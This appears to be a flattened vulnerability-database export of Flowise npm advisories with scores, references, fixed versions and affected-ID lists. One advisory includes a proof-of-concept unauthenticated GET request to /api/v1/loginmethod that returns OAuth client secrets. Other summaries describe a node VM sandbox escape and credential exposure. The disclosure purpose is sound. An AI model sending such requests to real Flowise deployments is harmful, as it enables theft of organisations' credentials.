reference_id 1888915
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value 7.5
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:29:42Z/
url https://hackerone.com/reports/1888915
3
reference_url https://github.com/advisories/GHSA-x5w6-38gp-mrqh
reference_id GHSA-x5w6-38gp-mrqh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x5w6-38gp-mrqh
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5w6-38gp-mrqh
reference_id GHSA-x5w6-38gp-mrqh
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.5
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:29:42Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5w6-38gp-mrqh
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41275, GHSA-x5w6-38gp-mrqh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-71uq-yx2j-cqak
14
url VCID-9bht-svq8-87b4
vulnerability_id VCID-9bht-svq8-87b4
summary Flowise has Insufficient Password Salt Rounds
references
0
reference_url https://github.com/FlowiseAI/Flowise/pull/5665
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/5665
1
reference_url https://github.com/advisories/GHSA-x2g5-fvc2-gqvp
reference_id GHSA-x2g5-fvc2-gqvp
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x2g5-fvc2-gqvp
2
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp
reference_id GHSA-x2g5-fvc2-gqvp
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases GHSA-x2g5-fvc2-gqvp
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9bht-svq8-87b4
15
url VCID-9rqv-p7rz-5kar
vulnerability_id VCID-9rqv-p7rz-5kar
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, the checkBasicAuth endpoint validates credentials in plaintext without rate limiting and with direct comparison. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46440
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.10533
published_at 2026-06-11T12:55:00Z
1
value 0.00044
scoring_system epss
scoring_elements 0.14051
published_at 2026-06-13T12:55:00Z
2
value 0.00044
scoring_system epss
scoring_elements 0.14054
published_at 2026-06-12T12:55:00Z
3
value 0.00048
scoring_system epss
scoring_elements 0.15369
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46440
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46440
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46440
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T19:18:05Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-php6-83fg-gw3g
reference_id GHSA-php6-83fg-gw3g
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-php6-83fg-gw3g
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-php6-83fg-gw3g
reference_id GHSA-php6-83fg-gw3g
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T19:18:05Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-php6-83fg-gw3g
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46440, GHSA-php6-83fg-gw3g
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9rqv-p7rz-5kar
16
url VCID-a1e4-f5dh-w3a5
vulnerability_id VCID-a1e4-f5dh-w3a5
summary 
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request
### Summary
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.


### PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.

Request
```http
GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json
```

Response: The server returns 200 OK with sensitive credentials:
```json
{
  "providers": [
    {
      "id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "azure",
      "config": {
        "tenantID": "",
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "google",
      "config": {
        "clientID": "123455",
        "clientSecret": "123455"
      },
      "status": "enable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "auth0",
      "config": {
        "domain": "",
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "github",
      "config": {
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    }
  ],
  "callbacks": [
    {
      "providerName": "azure",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
    },
    {
      "providerName": "google",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
    },
    {
      "providerName": "auth0",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
    },
    {
      "providerName": "github",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
    }
  ]
}
```
### Affected Deployments
- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed

### Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx
1
reference_url https://github.com/advisories/GHSA-6pcv-j4jx-m4vx
reference_id GHSA-6pcv-j4jx-m4vx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6pcv-j4jx-m4vx
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases GHSA-6pcv-j4jx-m4vx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-a1e4-f5dh-w3a5
17
url VCID-abyp-yn76-1yfp
vulnerability_id VCID-abyp-yn76-1yfp
summary Flowise v3.0.1 < 3.0.8 and all versions after with 'ALLOW_BUILTIN_DEP' enabled contain an authenticated remote code execution vulnerability and node VM sandbox escape due to insecure use of integrated modules (Puppeteer and Playwright) within the nodevm execution environment. An authenticated attacker able to create or run a tool that leverages Puppeteer/Playwright can specify attacker-controlled browser binary paths and parameters. When the tool executes, the attacker-controlled executable/parameters are run on the host and circumvent the intended nodevm sandbox restrictions, resulting in execution of arbitrary code in the context of the host. This vulnerability was incorrectly assigned as a duplicate CVE-2025-26319 by the developers and should be considered distinct from that identifier.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-34267
reference_id
reference_type
scores
0
value 0.01665
scoring_system epss
scoring_elements 0.82497
published_at 2026-06-11T12:55:00Z
1
value 0.01665
scoring_system epss
scoring_elements 0.82563
published_at 2026-06-14T12:55:00Z
2
value 0.01665
scoring_system epss
scoring_elements 0.82568
published_at 2026-06-13T12:55:00Z
3
value 0.01665
scoring_system epss
scoring_elements 0.82559
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-34267
1
reference_url https://flowiseai.com
reference_id
reference_type
scores
0
value 8.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://flowiseai.com
2
reference_url https://github.com/FlowiseAI/Flowise/pull/5231
reference_id 5231
reference_type
scores
0
value 8.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/
url https://github.com/FlowiseAI/Flowise/pull/5231
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-34267
reference_id CVE-2025-34267
reference_type
scores
0
value 8.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-34267
4
reference_url https://flowiseai.com/
reference_id flowiseai.com
reference_type
scores
0
value 8.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/
url https://flowiseai.com/
5
reference_url https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages
reference_id flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages
reference_type
scores
0
value 8.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/
url https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w
reference_id GHSA-5w3r-f6gm-c25w
reference_type
scores
0
value 8.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w
7
reference_url https://github.com/advisories/GHSA-r4hh-pcgx-j5r2
reference_id GHSA-r4hh-pcgx-j5r2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r4hh-pcgx-j5r2
fixed_packages
0
url pkg:npm/flowise@3.0.8
purl pkg:npm/flowise@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-488c-vrqu-f7hf
8
vulnerability VCID-5j9e-bcr5-n7bs
9
vulnerability VCID-5pup-kgaf-3ubw
10
vulnerability VCID-67mz-pfy4-ykep
11
vulnerability VCID-6ufs-d346-d7ev
12
vulnerability VCID-71uq-yx2j-cqak
13
vulnerability VCID-9bht-svq8-87b4
14
vulnerability VCID-9rqv-p7rz-5kar
15
vulnerability VCID-a1e4-f5dh-w3a5
16
vulnerability VCID-affy-v76q-fub6
17
vulnerability VCID-aqg8-6us7-uqef
18
vulnerability VCID-b97u-efzx-dffn
19
vulnerability VCID-bkmk-k9mn-ekhx
20
vulnerability VCID-cb6d-4c2v-w7c3
21
vulnerability VCID-cxja-9yxc-k7au
22
vulnerability VCID-d4wa-szeh-43ab
23
vulnerability VCID-dtss-epth-z7fh
24
vulnerability VCID-dzed-27rk-3qav
25
vulnerability VCID-e65e-s5sd-kuhp
26
vulnerability VCID-ejdc-j73x-jydk
27
vulnerability VCID-fu6t-9dk4-jbh9
28
vulnerability VCID-gt6n-beak-33gy
29
vulnerability VCID-gvpx-4wkw-43cz
30
vulnerability VCID-hdej-umwh-kqav
31
vulnerability VCID-hkfs-v3bp-kbh5
32
vulnerability VCID-j5hh-haj2-qydg
33
vulnerability VCID-jcze-eg2c-mkcf
34
vulnerability VCID-k579-xd81-hqdu
35
vulnerability VCID-kpyg-gve3-b3av
36
vulnerability VCID-ksmv-s6c9-t7ap
37
vulnerability VCID-m3j3-4u39-euht
38
vulnerability VCID-pzza-9xq9-a7de
39
vulnerability VCID-qm89-q2ar-uyhy
40
vulnerability VCID-r74e-k86f-7qgb
41
vulnerability VCID-rgmv-6bqh-eqf2
42
vulnerability VCID-s3jg-wce1-fbf3
43
vulnerability VCID-tdm1-91mc-8kgr
44
vulnerability VCID-v1nz-wwsu-qycg
45
vulnerability VCID-v9hg-7pex-g3dp
46
vulnerability VCID-w9yr-5jbp-q7fm
47
vulnerability VCID-xt1d-efw7-g3c6
48
vulnerability VCID-ywgu-76cy-uqe7
49
vulnerability VCID-z1y2-f2ws-8ycb
50
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8
aliases CVE-2025-34267, GHSA-r4hh-pcgx-j5r2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-abyp-yn76-1yfp
18
url VCID-affy-v76q-fub6
vulnerability_id VCID-affy-v76q-fub6
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30822
reference_id
reference_type
scores
0
value 0.00455
scoring_system epss
scoring_elements 0.6439
published_at 2026-06-14T12:55:00Z
1
value 0.00455
scoring_system epss
scoring_elements 0.64279
published_at 2026-06-11T12:55:00Z
2
value 0.00455
scoring_system epss
scoring_elements 0.64394
published_at 2026-06-13T12:55:00Z
3
value 0.00455
scoring_system epss
scoring_elements 0.64381
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30822
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30822
reference_id CVE-2026-30822
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30822
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
reference_id flowise%403.0.13
reference_type
scores
0
value 7.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
1
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:26Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
3
reference_url https://github.com/advisories/GHSA-mq4r-h2gh-qv7x
reference_id GHSA-mq4r-h2gh-qv7x
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mq4r-h2gh-qv7x
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x
reference_id GHSA-mq4r-h2gh-qv7x
reference_type
scores
0
value 7.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
1
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:26Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-30822, GHSA-mq4r-h2gh-qv7x
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-affy-v76q-fub6
19
url VCID-aqg8-6us7-uqef
vulnerability_id VCID-aqg8-6us7-uqef
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, /api/v1/public-chatbotConfig/:id ep exposes sensitive data including API keys, HTTP authorization headers and internal configuration without any authentication. An attacker with knowledge just of a chatflow UUID can retrieve credentials stored in password type fields and HTTP headers, leading to credential theft and more. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41266
reference_id
reference_type
scores
0
value 0.00107
scoring_system epss
scoring_elements 0.28731
published_at 2026-06-13T12:55:00Z
1
value 0.00107
scoring_system epss
scoring_elements 0.28721
published_at 2026-06-14T12:55:00Z
2
value 0.00107
scoring_system epss
scoring_elements 0.28509
published_at 2026-06-11T12:55:00Z
3
value 0.00107
scoring_system epss
scoring_elements 0.28705
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41266
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41266
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41266
2
reference_url https://github.com/advisories/GHSA-4jpm-cgx2-8h37
reference_id GHSA-4jpm-cgx2-8h37
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4jpm-cgx2-8h37
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4jpm-cgx2-8h37
reference_id GHSA-4jpm-cgx2-8h37
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
